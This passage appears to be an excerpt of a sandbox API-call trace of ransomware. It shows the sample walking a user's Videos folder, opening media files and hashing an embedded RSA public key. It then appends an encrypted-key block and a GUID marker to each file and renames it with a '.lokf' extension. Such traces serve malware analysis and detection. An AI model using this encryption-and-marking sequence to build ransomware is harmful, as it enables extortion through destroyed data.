KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.645] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.646] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.646] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.646] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.646] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.646] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.646] GetLastError () returned 0x0 [0060.646] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.646] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.646] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.647] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.647] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.647] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.647] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd7f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.647] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.648] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.648] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.648] CloseHandle (hObject=0x5cc) returned 1 [0060.649] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.649] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0060.649] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\HBgjb_CwGZsxIo486q.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hbgjb_cwgzsxio486q.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\HBgjb_CwGZsxIo486q.avi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hbgjb_cwgzsxio486q.avi.lokf")) returned 1 [0060.650] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf63fb160, ftCreationTime.dwHighDateTime=0x1d4cfd5, ftLastAccessTime.dwLowDateTime=0x5f75c20, ftLastAccessTime.dwHighDateTime=0x1d4cb7b, ftLastWriteTime.dwLowDateTime=0x5f75c20, ftLastWriteTime.dwHighDateTime=0x1d4cb7b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hWmlgmybmvGq Gv", cAlternateFileName="HWMLGM~1")) returned 1 [0060.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32ade10 [0060.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0060.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adf40 [0060.650] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90f8b5c0, ftCreationTime.dwHighDateTime=0x1d4cf32, ftLastAccessTime.dwLowDateTime=0xab4c0800, ftLastAccessTime.dwHighDateTime=0x1d4c596, ftLastWriteTime.dwLowDateTime=0xab4c0800, ftLastWriteTime.dwHighDateTime=0x1d4c596, nFileSizeHigh=0x0, nFileSizeLow=0xf3e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sTjbuO.swf", cAlternateFileName="")) returned 1 [0060.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.650] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201650 [0060.650] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\sTjbuO.swf") returned=".swf" [0060.650] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\sTjbuO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\stjbuo.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.650] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=62432) returned 1 [0060.650] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.653] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf3ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.653] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.653] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.653] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xf3e0, lpOverlapped=0x0) returned 1 [0060.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.654] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.654] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.654] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.655] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.655] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.655] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.655] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.655] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.655] GetLastError () returned 0x0 [0060.655] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.655] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.655] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.655] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.655] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.655] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.655] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.655] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.656] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf3e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.656] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.656] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.656] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.656] CloseHandle (hObject=0x5cc) returned 1 [0060.657] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.657] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0060.657] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\sTjbuO.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\stjbuo.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\sTjbuO.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\stjbuo.swf.lokf")) returned 1 [0060.658] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc52830, ftCreationTime.dwHighDateTime=0x1d4c667, ftLastAccessTime.dwLowDateTime=0x6f75c270, ftLastAccessTime.dwHighDateTime=0x1d4cc77, ftLastWriteTime.dwLowDateTime=0x6f75c270, ftLastWriteTime.dwHighDateTime=0x1d4cc77, nFileSizeHigh=0x0, nFileSizeLow=0xd3e2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wEuF.swf", cAlternateFileName="")) returned 1 [0060.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.658] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201650 [0060.658] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\wEuF.swf") returned=".swf" [0060.658] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\wEuF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\weuf.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.659] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=54242) returned 1 [0060.659] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.661] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd3bc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.661] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.662] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xd3e2, lpOverlapped=0x0) returned 1 [0060.662] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.662] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.662] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.662] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.662] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.663] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.663] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.663] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.663] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.663] GetLastError () returned 0x0 [0060.663] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.663] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.663] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.663] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.663] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.663] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.664] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.664] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.664] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd3e2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.664] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.664] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.664] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.664] CloseHandle (hObject=0x5cc) returned 1 [0060.665] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.665] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0060.665] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\wEuF.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\weuf.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\wEuF.swf.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\weuf.swf.lokf")) returned 1 [0060.667] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacccc0, ftCreationTime.dwHighDateTime=0x1d4d2e4, ftLastAccessTime.dwLowDateTime=0x26b59430, ftLastAccessTime.dwHighDateTime=0x1d4c604, ftLastWriteTime.dwLowDateTime=0x26b59430, ftLastWriteTime.dwHighDateTime=0x1d4c604, nFileSizeHigh=0x0, nFileSizeLow=0xbf86, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xRy69j3Nzz.flv", cAlternateFileName="XRY69J~1.FLV")) returned 1 [0060.667] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269b08 [0060.667] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa6) returned 0x3201650 [0060.667] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\xRy69j3Nzz.flv") returned=".flv" [0060.667] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\xRy69j3Nzz.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\xry69j3nzz.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.667] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=49030) returned 1 [0060.667] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.669] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbf60, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.669] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.670] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xbf86, lpOverlapped=0x0) returned 1 [0060.670] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.670] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0060.670] lstrlenA (lpString="-----BEGIN PUBLIC 